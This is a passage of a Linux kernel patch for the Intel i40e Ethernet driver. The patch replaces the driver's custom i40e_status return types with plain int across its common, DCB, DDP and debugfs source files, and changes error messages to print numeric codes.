+@@ -5162,12 +5029,12 @@ static enum i40e_status_code i40e_led_get_reg(struct i40e_hw *hw, u16 led_addr,
+  * @led_addr: LED register address
+  * @reg_val: register value to write
+  **/
+-static enum i40e_status_code i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
+-					      u32 reg_val)
++static int i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
++			    u32 reg_val)
+ {
+-	enum i40e_status_code status;
+ 	u8 phy_addr = 0;
+ 	u8 port_num;
++	int status;
+ 	u32 i;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE) {
+@@ -5197,17 +5064,17 @@ static enum i40e_status_code i40e_led_set_reg(struct i40e_hw *hw, u16 led_addr,
+  * @val: original value of register to use
+  *
+  **/
+-i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+-			     u16 *val)
++int i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
++		     u16 *val)
+ {
+-	i40e_status status = 0;
+ 	u16 gpio_led_port;
+ 	u8 phy_addr = 0;
+-	u16 reg_val;
++	u32 reg_val_aq;
++	int status = 0;
+ 	u16 temp_addr;
++	u16 reg_val;
+ 	u8 port_num;
+ 	u32 i;
+-	u32 reg_val_aq;
+ 
+ 	if (hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE) {
+ 		status =
+@@ -5252,12 +5119,12 @@ i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+  * Set led's on or off when controlled by the PHY
+  *
+  **/
+-i40e_status i40e_led_set_phy(struct i40e_hw *hw, bool on,
+-			     u16 led_addr, u32 mode)
++int i40e_led_set_phy(struct i40e_hw *hw, bool on,
++		     u16 led_addr, u32 mode)
+ {
+-	i40e_status status = 0;
+ 	u32 led_ctl = 0;
+ 	u32 led_reg = 0;
++	int status = 0;
+ 
+ 	status = i40e_led_get_reg(hw, led_addr, &led_reg);
+ 	if (status)
+@@ -5301,14 +5168,14 @@ restore_config:
+  * Use the firmware to read the Rx control register,
+  * especially useful if the Rx unit is under heavy pressure
+  **/
+-i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_rx_ctl_reg_read_write *cmd_resp =
+ 		(struct i40e_aqc_rx_ctl_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	if (!reg_val)
+ 		return I40E_ERR_PARAM;
+@@ -5332,8 +5199,8 @@ i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+  **/
+ u32 i40e_read_rx_ctl(struct i40e_hw *hw, u32 reg_addr)
+ {
+-	i40e_status status = 0;
+ 	bool use_register;
++	int status = 0;
+ 	int retry = 5;
+ 	u32 val = 0;
+ 
+@@ -5367,14 +5234,14 @@ do_retry:
+  * Use the firmware to write to an Rx control register,
+  * especially useful if the Rx unit is under heavy pressure
+  **/
+-i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 reg_val,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
++				  u32 reg_addr, u32 reg_val,
++				  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_rx_ctl_reg_read_write *cmd =
+ 		(struct i40e_aqc_rx_ctl_reg_read_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_rx_ctl_reg_write);
+ 
+@@ -5394,8 +5261,8 @@ i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+  **/
+ void i40e_write_rx_ctl(struct i40e_hw *hw, u32 reg_addr, u32 reg_val)
+ {
+-	i40e_status status = 0;
+ 	bool use_register;
++	int status = 0;
+ 	int retry = 5;
+ 
+ 	use_register = (((hw->aq.api_maj_ver == 1) &&
+@@ -5457,16 +5324,16 @@ static void i40e_mdio_if_number_selection(struct i40e_hw *hw, bool set_mdio,
+  * NOTE: In common cases MDIO I/F number should not be changed, thats why you
+  * may use simple wrapper i40e_aq_set_phy_register.
+  **/
+-enum i40e_status_code i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+-			     u8 phy_select, u8 dev_addr, bool page_change,
+-			     bool set_mdio, u8 mdio_num,
+-			     u32 reg_addr, u32 reg_val,
+-			     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
++				 u8 phy_select, u8 dev_addr, bool page_change,
++				 bool set_mdio, u8 mdio_num,
++				 u32 reg_addr, u32 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_phy_register_access *cmd =
+ 		(struct i40e_aqc_phy_register_access *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_register);
+@@ -5502,16 +5369,16 @@ enum i40e_status_code i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+  * NOTE: In common cases MDIO I/F number should not be changed, thats why you
+  * may use simple wrapper i40e_aq_get_phy_register.
+  **/
+-enum i40e_status_code i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+-			     u8 phy_select, u8 dev_addr, bool page_change,
+-			     bool set_mdio, u8 mdio_num,
+-			     u32 reg_addr, u32 *reg_val,
+-			     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
++				 u8 phy_select, u8 dev_addr, bool page_change,
++				 bool set_mdio, u8 mdio_num,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_phy_register_access *cmd =
+ 		(struct i40e_aqc_phy_register_access *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_phy_register);
+@@ -5542,18 +5409,17 @@ enum i40e_status_code i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+  * @error_info: returns error information
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum
+-i40e_status_code i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+-				   u16 buff_size, u32 track_id,
+-				   u32 *error_offset, u32 *error_info,
+-				   struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
++		      u16 buff_size, u32 track_id,
++		      u32 *error_offset, u32 *error_info,
++		      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_write_personalization_profile *cmd =
+ 		(struct i40e_aqc_write_personalization_profile *)
+ 		&desc.params.raw;
+ 	struct i40e_aqc_write_ddp_resp *resp;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_write_personalization_profile);
+@@ -5586,15 +5452,14 @@ i40e_status_code i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+  * @flags: AdminQ command flags
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum
+-i40e_status_code i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
+-				      u16 buff_size, u8 flags,
+-				      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
++			 u16 buff_size, u8 flags,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_applied_profiles *cmd =
+ 		(struct i40e_aqc_get_applied_profiles *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_personalization_profile_list);
+@@ -5693,14 +5558,13 @@ i40e_find_section_in_profile(u32 section_type,
+  * @hw: pointer to the hw struct
+  * @aq: command buffer containing all data to execute AQ
+  **/
+-static enum
+-i40e_status_code i40e_ddp_exec_aq_section(struct i40e_hw *hw,
+-					  struct i40e_profile_aq_section *aq)
++static int i40e_ddp_exec_aq_section(struct i40e_hw *hw,
++				    struct i40e_profile_aq_section *aq)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	u8 *msg = NULL;
+ 	u16 msglen;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, aq->opcode);
+ 	desc.flags |= cpu_to_le16(aq->flags);
+@@ -5740,14 +5604,14 @@ i40e_status_code i40e_ddp_exec_aq_section(struct i40e_hw *hw,
+  *
+  * Validates supported devices and profile's sections.
+  */
+-static enum i40e_status_code
++static int
+ i40e_validate_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		      u32 track_id, bool rollback)
+ {
+ 	struct i40e_profile_section_header *sec = NULL;
+-	i40e_status status = 0;
+ 	struct i40e_section_table *sec_tbl;
+ 	u32 vendor_dev_id;
++	int status = 0;
+ 	u32 dev_cnt;
+ 	u32 sec_off;
+ 	u32 i;
+@@ -5805,16 +5669,16 @@ i40e_validate_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Handles the download of a complete package.
+  */
+-enum i40e_status_code
++int
+ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		   u32 track_id)
+ {
+-	i40e_status status = 0;
+-	struct i40e_section_table *sec_tbl;
+ 	struct i40e_profile_section_header *sec = NULL;
+ 	struct i40e_profile_aq_section *ddp_aq;
+-	u32 section_size = 0;
++	struct i40e_section_table *sec_tbl;
+ 	u32 offset = 0, info = 0;
++	u32 section_size = 0;
++	int status = 0;
+ 	u32 sec_off;
+ 	u32 i;
+ 
+@@ -5868,15 +5732,15 @@ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Rolls back previously loaded package.
+  */
+-enum i40e_status_code
++int
+ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		      u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec = NULL;
+-	i40e_status status = 0;
+ 	struct i40e_section_table *sec_tbl;
+ 	u32 offset = 0, info = 0;
+ 	u32 section_size = 0;
++	int status = 0;
+ 	u32 sec_off;
+ 	int i;
+ 
+@@ -5920,15 +5784,15 @@ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Register a profile to the list of loaded profiles.
+  */
+-enum i40e_status_code
++int
+ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+ 		       struct i40e_profile_segment *profile,
+ 		       u8 *profile_info_sec, u32 track_id)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_profile_section_header *sec = NULL;
+ 	struct i40e_profile_info *pinfo;
+ 	u32 offset = 0, info = 0;
++	int status = 0;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -5962,7 +5826,7 @@ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+  * of the function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count)
+@@ -5970,8 +5834,8 @@ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 buff_len;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_add_cloud_filters);
+@@ -5999,7 +5863,7 @@ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+  * function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count)
+@@ -6007,8 +5871,8 @@ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buff_len;
++	int status;
+ 	int i;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+@@ -6056,7 +5920,7 @@ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+  * of the function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count)
+@@ -6064,8 +5928,8 @@ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 buff_len;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_remove_cloud_filters);
+@@ -6093,7 +5957,7 @@ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+  * function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count)
+@@ -6101,8 +5965,8 @@ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buff_len;
++	int status;
+ 	int i;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb.c b/drivers/net/ethernet/intel/i40e/i40e_dcb.c
+index 673f341f4c0c1..90638b67f8dc8 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb.c
+@@ -12,7 +12,7 @@
+  *
+  * Get the DCBX status from the Firmware
+  **/
+-i40e_status i40e_get_dcbx_status(struct i40e_hw *hw, u16 *status)
++int i40e_get_dcbx_status(struct i40e_hw *hw, u16 *status)
+ {
+ 	u32 reg;
+ 
+@@ -497,15 +497,15 @@ static void i40e_parse_org_tlv(struct i40e_lldp_org_tlv *tlv,
+  *
+  * Parse DCB configuration from the LLDPDU
+  **/
+-i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+-				    struct i40e_dcbx_config *dcbcfg)
++int i40e_lldp_to_dcb_config(u8 *lldpmib,
++			    struct i40e_dcbx_config *dcbcfg)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_lldp_org_tlv *tlv;
+-	u16 type;
+-	u16 length;
+ 	u16 typelength;
+ 	u16 offset = 0;
++	int ret = 0;
++	u16 length;
++	u16 type;
+ 
+ 	if (!lldpmib || !dcbcfg)
+ 		return I40E_ERR_PARAM;
+@@ -551,12 +551,12 @@ i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+  *
+  * Query DCB configuration from the Firmware
+  **/
+-i40e_status i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
+-				   u8 bridgetype,
+-				   struct i40e_dcbx_config *dcbcfg)
++int i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
++			   u8 bridgetype,
++			   struct i40e_dcbx_config *dcbcfg)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_virt_mem mem;
++	int ret = 0;
+ 	u8 *lldpmib;
+ 
+ 	/* Allocate the LLDPDU */
+@@ -767,9 +767,9 @@ static void i40e_cee_to_dcb_config(
+  *
+  * Get IEEE mode DCB configuration from the Firmware
+  **/
+-static i40e_status i40e_get_ieee_dcb_config(struct i40e_hw *hw)
++static int i40e_get_ieee_dcb_config(struct i40e_hw *hw)
+ {
+-	i40e_status ret = 0;
++	int ret = 0;
+ 
+ 	/* IEEE mode */
+ 	hw->local_dcbx_config.dcbx_mode = I40E_DCBX_MODE_IEEE;
+@@ -797,11 +797,11 @@ out:
+  *
+  * Get DCB configuration from the Firmware
+  **/
+-i40e_status i40e_get_dcb_config(struct i40e_hw *hw)
++int i40e_get_dcb_config(struct i40e_hw *hw)
+ {
+-	i40e_status ret = 0;
+-	struct i40e_aqc_get_cee_dcb_cfg_resp cee_cfg;
+ 	struct i40e_aqc_get_cee_dcb_cfg_v1_resp cee_v1_cfg;
++	struct i40e_aqc_get_cee_dcb_cfg_resp cee_cfg;
++	int ret = 0;
+ 
+ 	/* If Firmware version < v4.33 on X710/XL710, IEEE only */
+ 	if ((hw->mac.type == I40E_MAC_XL710) &&
+@@ -867,11 +867,11 @@ out:
+  *
+  * Update DCB configuration from the Firmware
+  **/
+-i40e_status i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
++int i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_lldp_variables lldp_cfg;
+ 	u8 adminstatus = 0;
++	int ret = 0;
+ 
+ 	if (!hw->func_caps.dcb)
+ 		return I40E_NOT_SUPPORTED;
+@@ -940,13 +940,13 @@ i40e_status i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
+  * Get status of FW Link Layer Discovery Protocol (LLDP) Agent.
+  * Status of agent is reported via @lldp_status parameter.
+  **/
+-enum i40e_status_code
++int
+ i40e_get_fw_lldp_status(struct i40e_hw *hw,
+ 			enum i40e_get_fw_lldp_status_resp *lldp_status)
+ {
+ 	struct i40e_virt_mem mem;
+-	i40e_status ret;
+ 	u8 *lldpmib;
++	int ret;
+ 
+ 	if (!lldp_status)
+ 		return I40E_ERR_PARAM;
+@@ -1238,13 +1238,13 @@ static void i40e_add_dcb_tlv(struct i40e_lldp_org_tlv *tlv,
+  *
+  * Set DCB configuration to the Firmware
+  **/
+-i40e_status i40e_set_dcb_config(struct i40e_hw *hw)
++int i40e_set_dcb_config(struct i40e_hw *hw)
+ {
+ 	struct i40e_dcbx_config *dcbcfg;
+ 	struct i40e_virt_mem mem;
+ 	u8 mib_type, *lldpmib;
+-	i40e_status ret;
+ 	u16 miblen;
++	int ret;
+ 
+ 	/* update the hw local config */
+ 	dcbcfg = &hw->local_dcbx_config;
+@@ -1274,8 +1274,8 @@ i40e_status i40e_set_dcb_config(struct i40e_hw *hw)
+  *
+  * send DCB configuration to FW
+  **/
+-i40e_status i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
+-				    struct i40e_dcbx_config *dcbcfg)
++int i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
++			    struct i40e_dcbx_config *dcbcfg)
+ {
+ 	u16 length, offset = 0, tlvid, typelength;
+ 	struct i40e_lldp_org_tlv *tlv;
+@@ -1888,13 +1888,13 @@ void i40e_dcb_hw_rx_pb_config(struct i40e_hw *hw,
+  *
+  * Reads the LLDP configuration data from NVM using passed addresses
+  **/
+-static i40e_status _i40e_read_lldp_cfg(struct i40e_hw *hw,
+-				       struct i40e_lldp_variables *lldp_cfg,
+-				       u8 module, u32 word_offset)
++static int _i40e_read_lldp_cfg(struct i40e_hw *hw,
++			       struct i40e_lldp_variables *lldp_cfg,
++			       u8 module, u32 word_offset)
+ {
+ 	u32 address, offset = (2 * word_offset);
+-	i40e_status ret;
+ 	__le16 raw_mem;
++	int ret;
+ 	u16 mem;
+ 
+ 	ret = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -1950,10 +1950,10 @@ err_lldp_cfg:
+  *
+  * Reads the LLDP configuration data from NVM
+  **/
+-i40e_status i40e_read_lldp_cfg(struct i40e_hw *hw,
+-			       struct i40e_lldp_variables *lldp_cfg)
++int i40e_read_lldp_cfg(struct i40e_hw *hw,
++		       struct i40e_lldp_variables *lldp_cfg)
+ {
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	u32 mem;
+ 
+ 	if (!lldp_cfg)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb.h b/drivers/net/ethernet/intel/i40e/i40e_dcb.h
+index 2370ceecb0612..6b60dc9b77361 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb.h
+@@ -264,20 +264,20 @@ void i40e_dcb_hw_calculate_pool_sizes(struct i40e_hw *hw,
+ void i40e_dcb_hw_rx_pb_config(struct i40e_hw *hw,
+ 			      struct i40e_rx_pb_config *old_pb_cfg,
+ 			      struct i40e_rx_pb_config *new_pb_cfg);
+-i40e_status i40e_get_dcbx_status(struct i40e_hw *hw,
+-				 u16 *status);
+-i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+-				    struct i40e_dcbx_config *dcbcfg);
+-i40e_status i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
+-				   u8 bridgetype,
+-				   struct i40e_dcbx_config *dcbcfg);
+-i40e_status i40e_get_dcb_config(struct i40e_hw *hw);
+-i40e_status i40e_init_dcb(struct i40e_hw *hw,
+-			  bool enable_mib_change);
+-enum i40e_status_code
++int i40e_get_dcbx_status(struct i40e_hw *hw,
++			 u16 *status);
++int i40e_lldp_to_dcb_config(u8 *lldpmib,
++			    struct i40e_dcbx_config *dcbcfg);
++int i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
++			   u8 bridgetype,
++			   struct i40e_dcbx_config *dcbcfg);
++int i40e_get_dcb_config(struct i40e_hw *hw);
++int i40e_init_dcb(struct i40e_hw *hw,
++		  bool enable_mib_change);
++int
+ i40e_get_fw_lldp_status(struct i40e_hw *hw,
+ 			enum i40e_get_fw_lldp_status_resp *lldp_status);
+-i40e_status i40e_set_dcb_config(struct i40e_hw *hw);
+-i40e_status i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
+-				    struct i40e_dcbx_config *dcbcfg);
++int i40e_set_dcb_config(struct i40e_hw *hw);
++int i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
++			    struct i40e_dcbx_config *dcbcfg);
+ #endif /* _I40E_DCB_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+index e32c61909b310..bba70bd5703bf 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+@@ -135,8 +135,8 @@ static int i40e_dcbnl_ieee_setets(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB ETS configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB ETS configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -174,8 +174,8 @@ static int i40e_dcbnl_ieee_setpfc(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB PFC configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB PFC configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -225,8 +225,8 @@ static int i40e_dcbnl_ieee_setapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -290,8 +290,8 @@ static int i40e_dcbnl_ieee_delapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ddp.c b/drivers/net/ethernet/intel/i40e/i40e_ddp.c
+index e1069ae658ad3..7e8183762fd95 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ddp.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ddp.c
+@@ -36,7 +36,7 @@ static int i40e_ddp_does_profile_exist(struct i40e_hw *hw,
+ {
+ 	struct i40e_ddp_profile_list *profile_list;
+ 	u8 buff[I40E_PROFILE_LIST_SIZE];
+-	i40e_status status;
++	int status;
+ 	int i;
+ 
+ 	status = i40e_aq_get_ddp_list(hw, buff, I40E_PROFILE_LIST_SIZE, 0,
+@@ -91,7 +91,7 @@ static int i40e_ddp_does_profile_overlap(struct i40e_hw *hw,
+ {
+ 	struct i40e_ddp_profile_list *profile_list;
+ 	u8 buff[I40E_PROFILE_LIST_SIZE];
+-	i40e_status status;
++	int status;
+ 	int i;
+ 
+ 	status = i40e_aq_get_ddp_list(hw, buff, I40E_PROFILE_LIST_SIZE, 0,
+@@ -117,14 +117,14 @@ static int i40e_ddp_does_profile_overlap(struct i40e_hw *hw,
+  *
+  * Register a profile to the list of loaded profiles.
+  */
+-static enum i40e_status_code
++static int
+ i40e_add_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 	       u8 *profile_info_sec, u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec;
+ 	struct i40e_profile_info *pinfo;
+-	i40e_status status;
+ 	u32 offset = 0, info = 0;
++	int status;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -157,14 +157,14 @@ i40e_add_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Removes DDP profile from the NIC.
+  **/
+-static enum i40e_status_code
++static int
+ i40e_del_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 	       u8 *profile_info_sec, u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec;
+ 	struct i40e_profile_info *pinfo;
+-	i40e_status status;
+ 	u32 offset = 0, info = 0;
++	int status;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -270,12 +270,12 @@ int i40e_ddp_load(struct net_device *netdev, const u8 *data, size_t size,
+ 	struct i40e_profile_segment *profile_hdr;
+ 	struct i40e_profile_info pinfo;
+ 	struct i40e_package_header *pkg_hdr;
+-	i40e_status status;
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	u32 track_id;
+ 	int istatus;
++	int status;
+ 
+ 	pkg_hdr = (struct i40e_package_header *)data;
+ 	if (!i40e_ddp_is_pkg_hdr_valid(netdev, pkg_hdr, size))
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+index c9dcd6d92c832..9954493cd4489 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+@@ -918,9 +918,9 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		dev_info(&pf->pdev->dev, "deleting relay %d\n", veb_seid);
+ 		i40e_veb_release(pf->veb[i]);
+ 	} else if (strncmp(cmd_buf, "add pvid", 8) == 0) {
+-		i40e_status ret;
+-		u16 vid;
+ 		unsigned int v;
++		int ret;
++		u16 vid;
+ 
+ 		cnt = sscanf(&cmd_buf[8], "%i %u", &vsi_seid, &v);
+ 		if (cnt != 2) {
+@@ -1284,7 +1284,7 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		}
+ 	} else if (strncmp(cmd_buf, "send aq_cmd", 11) == 0) {
+ 		struct i40e_aq_desc *desc;
+-		i40e_status ret;
++		int ret;
+ 
+ 		desc = kzalloc(sizeof(struct i40e_aq_desc), GFP_KERNEL);
+ 		if (!desc)
+@@ -1330,9 +1330,9 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		desc = NULL;
+ 	} else if (strncmp(cmd_buf, "send indirect aq_cmd", 20) == 0) {
+ 		struct i40e_aq_desc *desc;
+-		i40e_status ret;
+ 		u16 buffer_len;
+ 		u8 *buff;
++		int ret;
+ 
+ 		desc = kzalloc(sizeof(struct i40e_aq_desc), GFP_KERNEL);
+ 		if (!desc)
